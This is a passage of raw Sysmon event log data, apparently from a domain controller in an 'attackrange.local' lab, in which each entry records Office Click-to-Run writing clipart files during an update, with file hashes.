Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0212953.WMFMD5=48644681C43F2BDBE1DF8763C02AFC9C,SHA256=520CC0C30B970D08184ECCA152ADA7BBB13A37DD5A686FDA8CDAA5EEACFF5613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0212751.WMFMD5=2FEE35C857C5AC53F093BDC4C6F7EBF3,SHA256=97086914F05503AE0E1E43AFAA85E2A121B21E78757583D90ACE605393661F7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0212685.WMFMD5=F0378D3DACB948A12CCD10E26BA64BE9,SHA256=791DABB53755A76EFB385962D1D16FF8B71278562380CB5B216A4EAB8873CEB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0212601.WMFMD5=423D00899F6D212DCB17F3748E6CDD69,SHA256=D4DC5C186B9C5A6D9E22473F8F1EB1F99C0D797D41474041D3C016C745680FD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0212299.WMFMD5=279E499F9FD03A70BF881DA68904E277,SHA256=1E3B74F1DEF130DF9BFC678CDC2630340A81C4B537689F140A91344DE24C1888,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0211981.WMFMD5=1059C00402A7865DD6F2B2C681258A97,SHA256=3D6316AA4872C8C757158D8C81974E2D1AEA3E75DCE3E388CD0FB6C1987924C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0202045.JPGMD5=2D9A5D7782094CEFBFB7E18E5F8B6B74,SHA256=4AF2FF1152B88F3DAE960A3A528292AED2325CA1B945D21535F405ED5C691530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200611.WMFMD5=FFB1360192582F7E81F5FA12FA32E741,SHA256=5918BACA4968520510B6850C0F055B0CD6592BC8FC2EF30C2A1F97448E4956A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200521.WMFMD5=D0769CC9CC8F29CAA6125C9A2B9C6A17,SHA256=A6A23ACB330F44306AF651999525997B5E16A185C805A94C3DAFDAEE40B8FD12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200467.WMFMD5=A0D24BB24E1BD61DF712983A2EEB16C2,SHA256=778CD64F56F6E19B833DF00F2A9F00FD3C6C0E8DA78646C3994378659492873F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200383.WMFMD5=57CEF3191F0589FCD845977ECB9B8E23,SHA256=BA98722000D85B016C8DCCE952A25C76DD5F72D16B0A039CAD2963B89F903F60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200377.WMFMD5=587E0D9132FACFB17B39AB70701C5A45,SHA256=9F935585B29EE82C41D183253BFA961C3C3B189F21EEB2BF4C88BDB15DED8D60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200289.WMFMD5=03904B583376027FC4AE43A755A55FEE,SHA256=717FABADEF427D6AAD7BED8C6016DAF23A2344530FBB7296A174595BE678758E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200279.WMFMD5=C5DF0D2C89A464C0481C9ABF3AAC56CA,SHA256=C21211DB3DD7AED1EF13030EC44E467CABC84B143B7E88BD274BF3060741A048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200273.WMFMD5=07FA90EA1DCAA418F9D9891787115068,SHA256=0E8BFB43D9CD59DC9B2AA75096C3D16023684346A82EE0B5580A9AEE07B5555B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200189.WMFMD5=EE95B916E27A28771DFC3880E00D090F,SHA256=B189BC6EC815B98A32D6E686D6E22016C34FB747540C0EC4DC70C512DF627F39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200183.WMFMD5=633DDD52CFB3F91536D5F8641CDA93FC,SHA256=30947210C63252280481F4AD0A5021C8ED6B49C1B3F79F202466CFD0E3840346,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200163.WMFMD5=0D3A079428F8312B1FA392C46FAD601E,SHA256=714D7AB325DC51E111BAF76951C1F1DCE3BAED203955394686D27F23C8BAA741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0200151.WMFMD5=5779B422A6F024E4895ECBD16DCC4399,SHA256=AA81B33775766F512707EB487CCED56025B9FB60BAF5FF47E1DB82FCCB880C20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199609.WMFMD5=26E877B2548BFB730490B5069BE710D4,SHA256=D16C65A0DEDEBD3DCE0220AB5CD7075D3A5DB89EEAA925E9A009B482EE00D126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199483.WMFMD5=2F7ED0B756644FAC05E070E1C5724801,SHA256=E73D2E72AD475D26EFB737670ACDDA246C8D765453C5A59673F0B2BB35B6C511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199475.WMFMD5=A398D1B13DB00266FAF0A7DC3B68C47E,SHA256=6CAF0454A4D60A1ACF6C3B4AA7E1BB467985C73B82A21D2C4A55F472005E4CD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199473.WMFMD5=17BA7F342841789DE3B7217A3ED3457B,SHA256=6CB9A10F2041A547CAA44D9644B88081F74E18ED67B0DFFE2555DE2D1D84C934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199469.WMFMD5=797C3F2C6FCA0F873C2FB9E8FD6D77F6,SHA256=9FED3BBD311FEDFF874609B093C9BD980660CBD2E23541E430A7E812CD7BD5B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199465.WMFMD5=6FD2C053F38E51526E58D7E1B0DCA6F7,SHA256=1CC91856DD34B419A0F5A357AB2F860831EE1D47A3D4C2CE359B617F0596DE06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199429.WMFMD5=2FB902015D1B8CA088B3DE007ABD2508,SHA256=8BEC61E8A59EFA97B4C7D847B2F529C6EEA500A689BC90148C0E675269833D88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199423.WMFMD5=62EE1E9BB4CB517E712EA3A305E5225A,SHA256=EDEB4C8E70B804F4CE71B6908802282FBCA2E6B2A2A98B800F563AE931A029D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199307.WMFMD5=E03D5643F2F8862D2928920214F7A3B4,SHA256=2833CAB0E3F5BC0000229EFADDE64A97F7CE221051D25F5DC5735259575274FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199303.WMFMD5=FFB017565D0070B220061DF4A817A6EA,SHA256=D35D59A583D9A717E083DEA5B6150E94F28A9B30908CE1FAB653C52909403C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0199279.WMFMD5=C8411D57F2594974D1E23DBFA4264601,SHA256=17D26992063548C6D110454396033448134A67A670D6F9CDC7989F2A5E2E85AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198712.WMFMD5=6EE14199E64F700BA79BEBCB349C1A10,SHA256=26A3E902F1FD8B908D73364725B129B4ED9FE0AF712B4DD3F8B8CCD358E4E5E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198494.WMFMD5=2F8AF2E409E000F65D55AED38955CA32,SHA256=1D38D0F75A54B8968EC287050615BA98E00DEAD7EA0777138BD920098082B423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198447.WMFMD5=E21825588930980724CF1C5CEE8D9240,SHA256=8BE4F083BEA30BFB8E94E4147B68BBE22A7E4CE53A4FBCB22650EDB34CB3E6F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198377.WMFMD5=93CC706AE16153D60F3A06431E488539,SHA256=60FAAB8756C5507E4E10D81519EC9875B829A528249E5588C4144347A344D6D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198372.WMFMD5=F9E7FC78EB065EDE5DF61A861A6BF010,SHA256=55C14E4305B80B480BB9188917ECF403118A7269A1E12AB77730C73564C7E408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198234.WMFMD5=72C85E90AF34D3C572EEF7E70EB20BE4,SHA256=D84364A67AD4099D65165071A1DE5C0078A03EAEA798BF2574306D55968D9C54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198226.WMFMD5=944CA954164E1A2E426C52A7884EDBA8,SHA256=789DD447D9E2FD7C972E4BAFE8959A813C0F834D4F451CA817231022CC0E095F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198113.WMFMD5=DEBAE43ADF3B031D1B71C2E031571F9C,SHA256=AB496C620EFC264123755A6E2BD872C7E07C46816A0458B90B36C3379E23DF25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198102.WMFMD5=05DFF76C3BDC4223CB2F546CE1845AE6,SHA256=DBD1766EE5DAE9EB15944DE34CE774E9DD3357CC345784DF2F2BAA60BBCCC4F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198025.WMFMD5=6B7EFEF70B78425A27C45750056B331A,SHA256=1E695ECF46EE43093493B1B8B0C2A315FEC054F8A857F475F1674BA66334E79F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198022.WMFMD5=E9C050376C53E77CFC13F5647AB7D132,SHA256=CB47EDC02E5AFC984CA1444A5AFE7C466BA60C737EFB519E3257B43344663D33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198021.WMFMD5=87086A28748A2E45679D659CB33CF59C,SHA256=3522DB00D8AC722E0FB7426AEA3EC9BD6791E78A32D53C99795DBEAC79B21991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198020.WMFMD5=A91D1436D836607F04260F5AF5D39D43,SHA256=8A834F878572D8CFE5AF3AFEECC9AAA47CE647DB7411995B4B363D2FDA076B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0198016.WMFMD5=1A92771413863C3657DABB5708B955F6,SHA256=DA1BCC4AFAE3F8CDE1980F7E7352F32EEF22C5482101B031770BC2D077CEBB3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0197983.WMFMD5=581D4821D61A7518B22E513ED5BCFFA5,SHA256=BA759AC938B7E50CA280FA02AAEBA81E32FB0369A1B8A469D883DEA8B4B528DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 